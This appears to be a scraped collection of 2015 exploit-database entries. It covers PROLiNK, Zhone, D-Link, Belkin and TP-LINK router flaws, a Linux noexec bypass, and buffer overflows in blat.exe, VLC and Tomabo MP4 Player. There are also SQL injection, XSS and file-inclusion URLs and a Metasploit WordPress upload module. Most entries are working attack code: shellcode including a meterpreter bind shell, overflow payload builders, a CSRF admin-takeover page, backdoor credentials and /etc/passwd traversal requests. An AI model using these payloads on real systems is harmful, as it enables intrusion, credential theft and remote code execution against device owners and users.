HireHackking

# Exploit Title: [PROLiNK H5004NK ADSL Wireless Modem Multiple Vulnerabilities] # Discovered by: Karn Ganeshen # Reported on: [October 13, 2015] # Vendor Response: [No process to handle vuln reports] # Vendor Homepage: [ http://www.prolink2u.com/newtemp/datacom/adsl-modem-router/381-h5004nk.html] # Version Affected: [Firmware version R76S Slt 4WNE1 6.1R] **Vulnerability Details** *1. Default, weak passwords for http and ftp services * a. *HTTP accounts* - admin/password - user/user - guest/XXXXairocon <chain N="USERNAME_PASSWORD"> <V N="FLAG" V="0x0"/> <V N="USERNAME" V="admin"/> <V N="PASSWORD" V="password"/> <V N="BACKDOOR" V="0x0"/> <V N="PRIORITY" V="0x2"/> </chain> <chain N="USERNAME_PASSWORD"> <V N="FLAG" V="0x0"/> <V N="USERNAME" V="user"/> <V N="PASSWORD" V="user"/> <V N="BACKDOOR" V="0x0"/> <V N="PRIORITY" V="0x0"/> </chain> <chain N="USERNAME_PASSWORD"> <V N="FLAG" V="0x0"/> <V N="USERNAME" V="guest"/> <V N="PASSWORD" V="XXXXairocon"/> <V N="BACKDOOR" V="0x1"/> <V N="PRIORITY" V="0x1"/> </chain> *XXXX -> last four digits of MAC address * b. *FTP accounts* - admin/admin - useradmin/useradmin - user/user <chain N="FTP_SERVER"> <V N="ENABLE" V="0x1"/> <V N="USERNAME" V="admin"/> <V N="PASSWORD" V="admin"/> <V N="PORT" V="0x15"/> <V N="USERRIGHT" V="0x3"/> <V N="INSTNUM" V="0x1"/> </chain> <chain N="FTP_SERVER"> <V N="ENABLE" V="0x1"/> <V N="USERNAME" V="useradmin"/> <V N="PASSWORD" V="useradmin"/> <V N="PORT" V="0x15"/> <V N="USERRIGHT" V="0x2"/> <V N="INSTNUM" V="0x2"/> </chain> <chain N="FTP_SERVER"> <V N="ENABLE" V="0x1"/> <V N="USERNAME" V="user"/> <V N="PASSWORD" V="user"/> <V N="PORT" V="0x15"/> <V N="USERRIGHT" V="0x1"/> <V N="INSTNUM" V="0x3"/> </chain> 2. *Backdoor accounts* The device comes configured with privileged, backdoor account. For HTTP, 'guest' with attribute <V N="BACKDOOR" V="0x1"/>, is the backdoor account. This is seen in the config file: <chain N="USERNAME_PASSWORD"> <V N="FLAG" V="0x0"/> <V N="USERNAME" V="guest"/> <V N="PASSWORD" V="XXXXairocon"/> <V N="BACKDOOR" V="0x1"/> <V N="PRIORITY" V="0x1"/> </chain> This user is not shown / visible in the user list when logged in as admin (privileged user). 3. *No CSRF protection* There is no CSRF token set in any of the forms / pages. It is possible to silently execute HTTP requests if the user is logged in. 4. *Weak RBAC controls * 5a) *A non-admin user (user) can create and delete any other users, including root-privileged accounts. * There are three users: admin:password -> priv 2 is super user account with full functional access (admin/root) user:user -> priv 0 -> can access only some functions (user) guest:XXXXairocon -> privileged backdoor login *Normally: * - user can create new account with restricted user privs only. - user can change its password and only other non-admin users. - user can delete any other non-admin users. However, the application does not enforce strict rbac and it is possible for a non-admin user to create a new account with admin privileges. This is done as follows: 1. Start creating a new user, and intercepting the user creation POST request 2. Intercept & Change privilege parameter value from 0 (user) to 2 (admin) - Submit request 3. When the new admin user is created successfully, it does not show up in user list 4. Confirm via logging in as new admin, and / or configured accounts in configuration file (config.img) This is the POST request to create a new user: *Create user http request*: POST /form2userconfig.cgi HTTP/1.1 Host: <IP> User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://<IP>/userconfig.htm?v= Cookie: SessionID= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 115 username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm= *Note1*: In some cases, this password change function is not accessible to 'user' via GUI. But we can still send a POST request to create a valid, new higher privileged account. *Note2*: In some cases, application does not create admin priv user, in the first attempt. However, in the 2nd or 3rd attempt, new user is created without any issue. *Delete user http request:* A non-admin user can delete any configured user(s) including privileged users (admin). POST /form2userconfig.cgi HTTP/1.1 Host: <ip> User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://<IP>/userconfig.htm Cookie: SessionID= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 131 username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm% In case (non-admin) user is deleting the admin login (priv 2), action status can be confirmed by checking the configuration. In case (non-admin) user is deleting another user login (priv 0), action status can be confirmed by checking the user list. 5b) *(non-admin priv) User can access unauthorized functions.* Normally, 'user' does not have access to all the functionality of the device. It has access to Status, Setup and Maintenance. However, few functions can still be accessed by calling them directly. For example, to access the mac filtering configuration this url can be opened directly: http://<IP>/fw-macfilter.htm Other functions may also be accessible in this manner. 6. *Sensitive information not secured from low privileged users * A non-admin privileged user has access to download the configuration file - config.img. This file contains clear-text passwords, keys and other sensitive information which can be used to gain privileged access. 7. *Sensitive information accessible in clear-text* Sensitive Information like passwords and keys are not secured properly. Mostly these are either shown in clear-text or cen censored *****, it is possible to view clear-text values by 'Inspect Element' locally or intercepting http requests, or sniffing. -- Best Regards, Karn Ganeshen

# Exploit Title: Linux >= 3.17 noexec bypass with python ctypes and memfd_create # Date: 2015.10.14 # Exploit Author: soyer # Version: linux >= 3.17 # Tested on: Ubuntu 15.04 (x86_64) # # usage: # # $ ls -la exec_file # -rwxr-xr-x 1 soyer soyer 8600 Oct 14 15:04 exec_file # $ ./exec_file # bash: ./exec_file: Permission denied # $ mount |grep $(pwd) # tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k) # $ python noexec.py < exec_file # Hello world! fprintf=0x400470, stdout=0x7f63a3933740 from ctypes import * c = CDLL("libc.so.6") fd = c.syscall(319,"tempmem",0) c.sendfile(fd,0,0,0x7ffff000) c.fexecve(fd,byref(c_char_p()),byref(c_char_p())) print "fexecve failed"

''' [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-BLAT-MAILER-BUFFER-OVERFLOW.txt Vendor: ================================ www.blat.net http://sourceforge.net/projects/blat/ Product: ================================ Blat v2.7.6 blat.exe is a Win32 command line eMail tool that sends eMail using SMTP or post to usenet using NNTP. Vulnerability Type: ===================== Stack Buffer Overflow CVE Reference: ============== N/A Vulnerability Details: ===================== An older release of blat.exe v2.7.6 is prone to a stack based buffer overflow when sending malicious command line arguments, we need to send two arguments first can be whatever e.g. "AAAA" then second argument to trigger the buffer overflow and execute arbitrary code on the victims OS. Stack dump... EAX 00000826 ECX 0018E828 ASCII "Blat saw and processed these options, and was confused by the last one... AAAAAAA... EDX 0008E3C8 EBX 000000E1 ESP 0018F05C ASCII "AAAAA... EBP 41414141 ESI 00426E88 blat.00426E88 EDI 00272FD8 EIP 41414141 <-------------- BOOM! C 0 ES 002B 32bit 0(FFFFFFFF) P 1 CS 0023 32bit 0(FFFFFFFF) A 0 SS 002B 32bit 0(FFFFFFFF) Z 1 DS 002B 32bit 0(FFFFFFFF) S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0(FFFFFFFF) D 0 O 0 LastErr ERROR_SUCCESS (00000000) EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) Exploit code(s): =============== Python script to exploit... ''' import struct,os,subprocess #pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") vulnpgm="C:\\blat276\\full\\blat.exe " eip=struct.pack('<L', 0x776D0115) #<--- JMP ESP kernel32.dll payload="A"*2018+eip+"\x90"*20+sc subprocess.Popen([vulnpgm, "A"*4, payload], shell=False) ''' Disclosure Timeline: ========================================================= Oct 14, 2015 : Public Disclosure Severity Level: ========================================================= Med =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx '''

Vantage Point Security Advisory 2015-003 ======================================== Title: Multiple Remote Code Execution found in ZHONE Vendor: Zhone Vendor URL: http://www.zhone.com Device Model: ZHONE ZNID GPON 2426A (24xx, 24xxA, 42xx, 42xxA, 26xx, and 28xx series models) Versions affected: < S3.0.501 Severity: High Vendor notified: Yes Reported: Public release: Author: Lyon Yang <lyon[at]vantagepoint[dot]sg> <lyon.yang.s[at]gmail[dot]com> Paper: https://www.exploit-db.com/docs/english/39658-exploiting-buffer-overflows-on-mips-architecture.pdf Summary: -------- ZHONE RGW is vulnerable to stack-based buffer overflow attacks due to the use of unsafe string functions without sufficient input validation in the httpd binary. Two exploitable conditions were discovered when requesting a large (7000) character filename ending in .cgi, .tst, .html, .cmd, .conf, .txt and .wl, in GET or POST requests. Vantage Point has developed working code execution exploits for these issues. 1. Stack Overflow via HTTP GET Request --------------------------------------------------------------------------------------- GET /.cmd?AAAA…..AAAA<7000 Characters> HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/zhnvlanadd.html Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>) Connection: keep-alive 2. Stack Overflow via HTTP POST Request --------------------------------------------------------------------------------------- POST /.cgi HTTP/1.1 Host: 192.168.1.1 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/updatesettings.html Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>) Content-Length: 88438 AAAA…..AAAA<7000 Characters> Fix Information: ---------------- Upgrade to version S3.1.241 Timeline: --------- 2015/04: Issues reported to Zhone 2015/06: Requested Update 2015/08: Requested Update 2015/09: Requested Update 2015/10: Confirm that all issues has been fixed About Vantage Point Security: -------------------- Vantage Point is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture. https://www.vantagepoint.sg/ office[at]vantagepoint[dot]sg

source: https://www.securityfocus.com/bid/59069/info Todoo Forum is prone to multiple SQL-injection and cross-site scripting vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Todoo Forum 2.0 is vulnerable; other versions may also be affected. http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=[Inject_here]&pg=1 http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here]

source: https://www.securityfocus.com/bid/59069/info Todoo Forum is prone to multiple SQL-injection and cross-site scripting vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Todoo Forum 2.0 is vulnerable; other versions may also be affected. http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post='"--></style></script><script>alert(0x0000)</script>&pg=1 http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg='"--></style></script><script>alert(0x0000)</script>

source: https://www.securityfocus.com/bid/59290/info Matrix42 Service Store is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Service Store 5.3 SP3 (5.33.946.0) is vulnerable; other versions may also be affected. https://www.example.com/SPS/Portal/default.aspx?'"--></style></script> <script>alert(document.cookie)</script> [XSS]

source: https://www.securityfocus.com/bid/59298/info Fork CMS is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. http://www.example.com/frontend/js.php?module=core&file=../../../../../../../../../../../../../../../../etc/passwd&language=en&m=1339527371

source: https://www.securityfocus.com/bid/59278/info Sosci Survey is prone to following security vulnerabilities: 1. An unauthorized-access vulnerability 2. Multiple cross-site scripting vulnerabilities 3. Multiple HTML-injection vulnerabilities 4. A PHP code-execution vulnerability Successful exploits may allow an attacker to gain unauthorized access to the affected application, allow attacker-supplied HTML and script code to run in the context of the affected browser, allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or inject and execute arbitrary malicious PHP code in the context of the web server process. https://www.example.com/admin/index.php?o=account&a=message.reply&id=[msg_id] https://www.example.com/admin/index.php?o=panel&a=receiver.edit&id=<script>alert(document.cookie)</script>

source: https://www.securityfocus.com/bid/59322/info Crafty Syntax Live Help is prone to a remote file-include vulnerability and a path-disclosure vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting these issues could allow an attacker to obtain sensitive information and compromise the application and the underlying system; other attacks are also possible. Crafty Syntax Live Help versions 2.x and versions 3.x are vulnerable. File-include: http://www.example.com/path/admin.php?page=[RFI] Path-disclosure: http://www.example.com/livehelp/xmlhttp.php

source: https://www.securityfocus.com/bid/59325/info TP-LINK TL-WR741N and TL-WR741ND routers are prone to multiple denial-of-service vulnerabilities when handling specially crafted HTTP requests. Successful exploits will cause the device to crash, denying service to legitimate users. GET http://www.example.com:80/userRpm/DdnsAddRpm.htm?provider=4 HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://www.example.com/userRpm/DdnsAddRpm.htm?provider=4 Authorization: Basic YWRtaW46YWRtaW4= GET http://www.example.com:80/help/../../root HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://www.example.com/help/

source: https://www.securityfocus.com/bid/59312/info D-Link DIR-865L is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible. D-Link DIR-865L firmware version 1.03 is vulnerable; other versions may also be affected. <html> <head> <title> D-LINK DIR-865L CSRF</title> <!-- Firmware Version: 1.03 Fri 02 Nov 2012 --> </head> <body> <form name="dlinkXML" action="http://192.168.0.1/hedwig.cgi" enctype="text/plain" method="post"> <input type="hidden" name="<?xml version" value="'1.0' encoding='UTF-8'?> <postxml> <module> <service>DEVICE.ACCOUNT</service> <device> <gw_name>DIR-865L</gw_name> <account> <seqno>1</seqno> <max>2</max> <count>1</count> <entry> <uid>USR-</uid> <name>Admin</name> <usrid/> <password>ISE</password> <group>0</group> <description/> </entry> </account> <group> <seqno/> <max/> <count>0</count> </group> <session> <captcha>0</captcha> <dummy/> <timeout>600</timeout> <maxsession>128</maxsession> <maxauthorized>16</maxauthorized> </session> </device> </module> <module> <service>HTTP.WAN-1</service> <inf> <web>1337</web> <https_rport></https_rport> <stunnel>1</stunnel> <weballow> <hostv4ip/> </weballow> <inbfilter></inbfilter> </inf> </module> <module> <service>HTTP.WAN-2</service> <inf> <web>1337</web> <weballow></weballow> </inf> </module> <module> <service>INBFILTER</service> <acl> <inbfilter> <seqno>1</seqno> <max>24</max> <count>0</count> </inbfilter> </acl> <ACTIVATE>ignore</ACTIVATE> <FATLADY>ignore</FATLADY> <SETCFG>ignore</SETCFG> </module> <module> <service>SHAREPORT</service> <FATLADY>ignore</FATLADY> <ACTIVATE>ignore</ACTIVATE> </module> </postxml>"> </form> <script> function CSRF1() {document.dlinkXML.submit();};window.setTimeout(CSRF1,1000) function CSRF2() {window.open("http://192.168.0.100/dlinkCSRF2.html");}; window.setTimeout(CSRF2,1000) </script> </body> </html>

## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::HTTP::Wordpress def initialize(info = {}) super(update_info( info, 'Name' => 'WordPress Plugin ajax-load-more Authenticated Arbitrary File Upload', 'Description' => %q{ This module exploits an authenticated file upload vulnerability in Wordpress plugin ajax-load-more versions < 2.8.2. Valid wordpress credentials are required for the exploit to work. Tested with version v2.7.3. (May work on older versions). }, 'License' => MSF_LICENSE, 'Author' => [ 'Pizza Hat Hacker <PizzaHatHacker[A]gmail[.]com', # Vulnerability discovery & Metasploit module ], 'References' => [ ['WPVDB', '8209'] ], 'DisclosureDate' => 'Oct 02 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['ajax-load-more', {}]], 'DefaultTarget' => 0 )) register_options( [ OptString.new('WP_USER', [true, 'A valid wordpress username', nil]), OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil]) ], self.class) end def user datastore['WP_USER'] end def password datastore['WP_PASSWORD'] end def check # Check plugin version ver = check_plugin_version_from_readme('ajax-load-more, 2.8.2') if ver return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit # Wordpress login print_status("#{peer} - Trying to login as #{user}") cookie = wordpress_login(user, password) if cookie.nil? print_error("#{peer} - Unable to login as #{user}") return end url = normalize_uri(wordpress_url_backend, 'profile.php') print_status("#{peer} - Retrieving WP nonce from #{url}") res = send_request_cgi({ 'method' => 'GET', 'uri' => url, 'cookie' => cookie }) if res and res.code == 200 # "alm_admin_nonce":"e58b6d536d" res.body =~ /\"alm_admin_nonce\":\"([0-9a-f]+)\"/ wp_nonce = $1 if wp_nonce print_good("#{peer} Found ajax-load-more wp_nonce value : #{wp_nonce}") else vprint_error("#{peer} #{res.body}") fail_with(Failure::Unknown, "#{peer} - Unable to retrieve wp_nonce from user profile page.") end else fail_with(Failure::Unknown, "#{peer} - Unexpected server response (code #{res.code}) while accessing user profile page.") end print_status("#{peer} - Trying to upload payload") # Generate MIME message data = Rex::MIME::Message.new data.add_part('alm_save_repeater', nil, nil, 'form-data; name="action"') data.add_part(wp_nonce, nil, nil, 'form-data; name="nonce"') data.add_part('default', nil, nil, 'form-data; name="type"') data.add_part("#{rand_text_alpha_lower(3)}", nil, nil, 'form-data; name="repeater"') data.add_part(payload.encoded, nil, nil, 'form-data; name="value"') print_status("#{peer} - Uploading payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_admin_ajax), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s, 'cookie' => cookie }) filename = 'default.php' if res if res.code == 200 lines = res.body.split("\n") if lines.length > 0 message = lines[lines.length - 1] if message.include?('Template Saved Successfully') register_files_for_cleanup(filename) else vprint_error("#{peer} - Unexpected web page content : #{message}") end else fail_with(Failure::Unknown, "#{peer} - Unexpected empty server response") end else fail_with(Failure::Unknown, "#{peer} - Unexpected HTTP response code : #{res.code}") end else fail_with(Failure::Unknown, 'Server did not respond in an expected way') end print_status("#{peer} - Calling uploaded file #{filename}") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename) ) end end

# Exploit Title: VLC | libvlccore - (.mp3) Stack Overflow # Date: 18/10/2015 # Exploit Author: Andrea Sindoni # Software Link: https://www.videolan.org/vlc/index.it.html # Version: 2.2.1 # Tested on: Windows 7 Professional 64 bits # # PoC with MP3: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38485.zip # #APP: vlc.exe #ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) amd64fre #FOLLOWUP_NAME: MachineOwner #MODULE_NAME: libvlccore #IMAGE_NAME: libvlccore.dll #FAILURE_ID_HASH_STRING: um:wrong_symbols_c00000fd_libvlccore.dll!vlm_messageadd #Exception Hash (Major/Minor): 0x60346a4d.0x4e342e62 #EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff) #ExceptionAddress: 00000000749ba933 (libvlccore!vlm_MessageAdd+0x00000000000910d3) # ExceptionCode: c00000fd (Stack overflow) # ExceptionFlags: 00000000 #NumberParameters: 2 # Parameter[0]: 0000000000000001 # Parameter[1]: 0000000025ed2a20 # #eax=00436f00 ebx=2fdc0100 ecx=25ed2a20 edx=00632efa esi=17fb2fdc edi=00000001 #eip=749ba933 esp=260cfa14 ebp=260cfa78 iopl=0 nv up ei pl nz na po nc #cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 # #Stack Overflow starting at libvlccore!vlm_MessageAdd+0x00000000000910d3 (Hash=0x60346a4d.0x4e342e62) # import eyed3 value = u'B'*6500000 audiofile = eyed3.load("base.mp3") audiofile.tag.artist = value audiofile.tag.album = u'andrea' audiofile.tag.album_artist = u'sindoni' audiofile.tag.save()

# Title: Path Traversal Vulnerability # Product: Belkin Router N150 # Author: Rahul Pratap Singh # Website: https://0x62626262.wordpress.com # Contact: Linkedin: https://in.linkedin.com/in/rahulpratapsingh94 Twitter: @0x62626262 # Vendor Homepage: http://www.belkin.com # Firmware Tested: 1.00.08, 1.00.09 # CVE: 2014-2962 Description: Belkin N150 wireless router firmware versions 1.00.07 and earlier contain a path traversal vulnerability through the built-in web interface. The webproc cgi module accepts a getpage parameter which takes an unrestricted file path as input. The web server runs with root privileges by default, allowing a malicious attacker to read any file on the system. A patch was released by Belkin but that is still vulnerable. POC: http://192.168.2.1/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo #root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh #tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh Ref: https://www.kb.cert.org/vuls/id/774788 https://0x62626262.wordpress.com/category/full-disclosure/

Source: https://code.google.com/p/google-security-research/issues/detail?id=547 If IExternalizable.writeExternal is overridden with a value that is not a function, Flash assumes it is a function even though it is not one. This leads to execution of a 'method' outside of the ActionScript object's ActionScript vtable, leading to memory corruption. A sample swf is attached. ActionScript code is also attached, but it does not compile to the needed to swf. To get the PoC, decompress the swf using flasm -x myswf, and then search for "triteExternal" and change it to "writeExternal". This bug is in the AVM serializer (http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/AvmSerializer.cpp), and is type confusion when calling the method writeExternal, which is implemented when a class extends IExternalizable (http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/IExternalizable.html). The method is resolved on line 1437 of AvmSerializer.cpp by calling toplevel->getBinding, which does not guarantee that the binding is a method binding. It then gets cast to a method on line 773 and called, which is type confusion. One challenge with the bug is actually creating a SWF which can hit this code, as usually overriding a defined method will lead to an illegal override exception. The 0-day author did this differently than I did. The code where all class properties (methods, internal classes, variables, etc.) are resolved is in http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/Traits.cpp. You can see on line 813 that a check that no two properties of a class have the same name is commented out due to some legitimate SWFs doing that. This means that a SWF can have a variable with the same name as a method (overriding a method with less restrictive method is still illegal), which is how my PoC overrode the method. The 0-day did something slightly different, it put the redefinition of writeExternal in a different public namespace than the original definition of writeExternal. This has the benefit that the ActionScript will compile and hit the bug without modification. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38490.zip

#!/usr/bin/python ##################################################################### # Exploit Title: Tomabo MP4 Player 3.11.6 SEH Based Stack Overflow # # Exploit Author: @yokoacc, @nudragn, @rungga_reksya # # Vendor Homepage: http://www.tomabo.com/ # # Software Link: http://www.tomabo.com/mp4-player/download.html # # Vulnerable App: Attached # # Version: 3.11.6 (possibility <= 3.11.6) # # Tested on: Windows XP, 7, 8, and 8.1 # # Special Thanks to: @OffsecTraining # # Vendor Notification: August 30th, 2015 # # Fixed Date: Around September 16th, 2015 (didn't response yet) # # Public Disclosure: October 18th, 2015 # ##################################################################### # How to: Run the code and open the m3u file with the Vulnerable MP4 Player by Tomabo # Bad Character = '\x00\x09\x0a\x0b\x0c\x0d\x1a\x20' # Payload= windows/meterpreter/bind_tcp ; PORT=4444 file ="whatever.m3u" load = "\x41" * 1028 load += "\xeb\x08\x90\x90" load += "\xA9\x1C\x40\x00" load += "\x90" * 16 load += ("\xdb\xde\xbd\xbc\x9e\x98\xd8\xd9\x74\x24\xf4\x5f\x29\xc9\xb1" "\x48\x31\x6f\x18\x03\x6f\x18\x83\xef\x40\x7c\x6d\x24\x50\x03" "\x8e\xd5\xa0\x64\x06\x30\x91\xa4\x7c\x30\x81\x14\xf6\x14\x2d" "\xde\x5a\x8d\xa6\x92\x72\xa2\x0f\x18\xa5\x8d\x90\x31\x95\x8c" "\x12\x48\xca\x6e\x2b\x83\x1f\x6e\x6c\xfe\xd2\x22\x25\x74\x40" "\xd3\x42\xc0\x59\x58\x18\xc4\xd9\xbd\xe8\xe7\xc8\x13\x63\xbe" "\xca\x92\xa0\xca\x42\x8d\xa5\xf7\x1d\x26\x1d\x83\x9f\xee\x6c" "\x6c\x33\xcf\x41\x9f\x4d\x17\x65\x40\x38\x61\x96\xfd\x3b\xb6" "\xe5\xd9\xce\x2d\x4d\xa9\x69\x8a\x6c\x7e\xef\x59\x62\xcb\x7b" "\x05\x66\xca\xa8\x3d\x92\x47\x4f\x92\x13\x13\x74\x36\x78\xc7" "\x15\x6f\x24\xa6\x2a\x6f\x87\x17\x8f\xfb\x25\x43\xa2\xa1\x21" "\xa0\x8f\x59\xb1\xae\x98\x2a\x83\x71\x33\xa5\xaf\xfa\x9d\x32" "\xd0\xd0\x5a\xac\x2f\xdb\x9a\xe4\xeb\x8f\xca\x9e\xda\xaf\x80" "\x5e\xe3\x65\x3c\x57\x42\xd6\x23\x9a\x34\x86\xe3\x35\xdc\xcc" "\xeb\x6a\xfc\xee\x21\x03\x94\x12\xca\x3d\x38\x9a\x2c\x57\xd0" "\xca\xe7\xc0\x12\x29\x30\x76\x6d\x1b\x68\x10\x26\x4d\xaf\x1f" "\xb7\x5b\x87\xb7\x33\x88\x13\xa9\x44\x85\x33\xbe\xd2\x53\xd2" "\x8d\x43\x63\xff\x64\x83\xf1\x04\x2f\xd4\x6d\x07\x16\x12\x32" "\xf8\x7d\x29\xfb\x6c\x3e\x45\x04\x61\xbe\x95\x52\xeb\xbe\xfd" "\x02\x4f\xed\x18\x4d\x5a\x81\xb1\xd8\x65\xf0\x66\x4a\x0e\xfe" "\x51\xbc\x91\x01\xb4\x3c\xed\xd7\xf0\x4a\x1f\xe4") load += "\x44" * (1800 - len(load)) writeFile = open (file, "w") writeFile.write(load) writeFile.close()

source: https://www.securityfocus.com/bid/59371/info The Colormix theme for WordPress is prone to multiple security vulnerabilities, including: 1. A cross-site scripting vulnerability 2. A path-disclosure vulnerability 3. Multiple content-spoofing vulnerabilities An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. Content spoofing: http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://www.example1.com http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF Cross-site scripting: http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

